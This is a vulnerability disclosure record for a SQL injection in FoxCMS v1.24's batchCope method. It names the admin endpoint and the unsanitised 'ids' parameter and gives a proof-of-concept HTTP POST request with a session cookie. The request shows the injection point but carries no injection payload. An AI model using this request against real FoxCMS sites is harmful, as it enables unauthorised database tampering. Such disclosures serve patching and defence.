| Title | 贵州黔狐科技股份有限公司 foxcms v1.24 SQL Injection |
|---|---|
| Description | In the batchCope method of foxcms, the ids parameter passed from the front end is not processed at all and is directly concatenated into the SQL statement. The SQL statement then performs an insert operation, which leads to a SQL injection vulnerability. The vulnerable interface is /admin3953/images/batchCope.html and the parameter is ids. The POC is shown below the table. |
| Source | https://github.com/ueh1013/VULN/issues/3 |
| User | jhsec.com (UID 89557) |
| Submission | 08/27/2025 14:42 (7 months ago) |
| Moderation | 09/11/2025 07:21 (15 days later) |
| Status | Accepted |
| VulDB entry | 323611 [FoxCMS up to 1.24 Images.php batchCope ids sql injection] |
| Points | 20 |

POC:

```http
POST /admin3953/images/batchCope.html HTTP/1.1
Host: www.foxcms.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 18
Origin: http://www.foxcms.com
Connection: close
Referer: http://www.foxcms.com/admin3953/article/index.html?columnId=8&bcid=1_8
Cookie: PHPSESSID=bf6a099242593444d6ab2d90da8244f1; access_127_0_0_1=1756266092
Priority: u=0

ids=62
```